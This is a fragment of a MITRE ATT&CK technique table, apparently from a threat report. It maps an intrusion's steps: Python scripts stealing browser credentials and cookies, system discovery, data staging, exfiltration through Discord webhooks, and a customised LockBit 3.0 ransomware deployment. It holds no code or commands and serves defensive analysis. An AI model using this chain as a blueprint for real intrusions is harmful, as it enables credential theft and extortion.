| Credential Access | T1555 | Credentials from Password Stores | T1555.003 | Credentials from Web Browsers | Deploys custom Python scripts (Fadmino.py) to access and exfiltrate credentials and cookies from local browser NSS databases. |
| Discovery | T1082 | System Information Discovery | | | Python stealer scripts (cadmino.py) collect detailed system information, including OS version, hardware, and installed applications. |
| Collection | T1119 | Automated Collection | | | Utilizes scripts to automatically gather and stage data from browser stores and the local file system for exfiltration. |
| Command and Control | T1102 | Web Service | T1102.002 | Bidirectional Communication | Uses Discord webhooks as a C2 and exfiltration channel, sending stolen data via HTTP POST requests to a Discord server. |
| Exfiltration | T1567 | Exfiltration Over Web Service | T1567.002 | Exfiltration to Cloud Storage | Exfiltrates all collected data (credentials, system info, API keys) to a Discord server via webhooks. |
| Impact | T1486 | Data Encrypted for Impact | | | Deploys a customized version of LockBit 3.0 ransomware to encrypt files on local systems and connected network shares. |